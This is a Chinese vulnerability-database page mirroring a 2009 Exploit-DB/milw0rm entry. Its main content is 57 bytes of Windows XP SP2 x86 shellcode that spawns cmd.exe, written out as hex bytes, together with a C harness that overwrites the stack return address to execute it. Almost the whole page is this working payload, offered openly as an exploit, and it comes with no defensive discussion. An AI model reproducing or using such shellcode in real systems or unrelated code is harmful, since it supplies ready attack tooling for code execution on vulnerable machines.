Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057405 漏洞类型
发布时间 2009-02-03 更新时间 2009-02-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13511
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
win32/xp sp2 cmd.exe 57 bytes
Author : Mountassif Moad
Big Thnx : Houssamix :d
Assembly Code : Secret
Changed by : Stack
Description : It is 57 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2
*/
#include <stdlib.h>
#include <string.h>
unsigned char shellcode[] =
"\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
"\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
"\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
"\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
"\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}

// milw0rm.com [2009-02-03]